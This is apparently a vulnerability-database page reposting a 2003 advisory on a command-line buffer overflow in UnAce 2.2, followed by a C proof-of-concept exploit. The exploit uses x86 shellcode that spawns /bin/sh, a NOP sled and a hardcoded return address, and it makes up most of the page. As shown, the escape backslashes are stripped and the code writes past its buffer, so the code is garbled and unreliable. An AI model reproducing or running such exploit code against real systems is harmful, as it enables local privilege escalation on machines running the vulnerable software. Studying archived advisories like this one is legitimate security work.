Winace UnAce 2.2 – Command Line Argument Buffer Overflow (1)
漏洞ID | 1054243 | 漏洞类型 | |
发布时间 | 2003-11-10 | 更新时间 | 2003-11-10 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9002/info
UnAce has been reported to be prone to a buffer overflow vulnerability. The issue presents itself when UnAce handles ace filenames that are of excessive length. When this filename is passed to the UnAce utility as an argument, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the user who is running UnAce.
/* gEEk-unace.c
*
* PoC exploit made for advisory based uppon an local stack based overflow.
* Vulnerable versions, maybe also prior versions:
*
* Unace v2.2
*
* Tested on: Debian 3.0
*
* Advisory source: MegaHz
* http://www.securityfocus.com/archive/1/344065/2003-11-07/2003-11-13/0
*
* -----------------------------------------
* coded by: demz (geekz.nl) ([email protected])
* -----------------------------------------
*
*/
#include <stdio.h>
#include <stdlib.h>
char shellcode[]=
"x31xc0" // xor eax, eax
"x31xdb" // xor ebx, ebx
"x31xc9" // xor ecx, ecx
"xb0x46" // mov al, 70
"xcdx80" // int 0x80
"x31xc0" // xor eax, eax
"x50" // push eax
"x68x6ex2fx73x68" // push long 0x68732f6e
"x68x2fx2fx62x69" // push long 0x69622f2f
"x89xe3" // mov ebx, esp
"x50" // push eax
"x53" // push ebx
"x89xe1" // mov ecx, esp
"x99" // cdq
"xb0x0b" // mov al, 11
"xcdx80" // int 0x80
"x31xc0" // xor eax, eax
"xb0x01" // mov al, 1
"xcdx80"; // int 0x80
int main()
{
unsigned long ret = 0xbfffc260;
char buffer[707];
int i=0;
memset(buffer, 0x90, sizeof(buffer));
for (0; i < strlen(shellcode) - 1;i++)
buffer[300 + i] = shellcode[i];
buffer[707] = (ret & 0x000000ff);
buffer[708] = (ret & 0x0000ff00) >> 8;
buffer[709] = (ret & 0x00ff0000) >> 16;
buffer[710] = (ret & 0xff000000) >> 24;
buffer[711] = 0x0;
printf("nUnace v2.2 local exploitn");
printf("---------------------------------------- demz @ geekz.nl --n");
execl("./unace", "unace", "e", buffer, NULL);
}
相关推荐: RSAREF Buffer Overflow Vulnerability
RSAREF Buffer Overflow Vulnerability 漏洞ID 1104496 漏洞类型 Boundary Condition Error 发布时间 1999-12-01 更新时间 1999-12-01 CVE编号 N/A CNNVD-ID…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666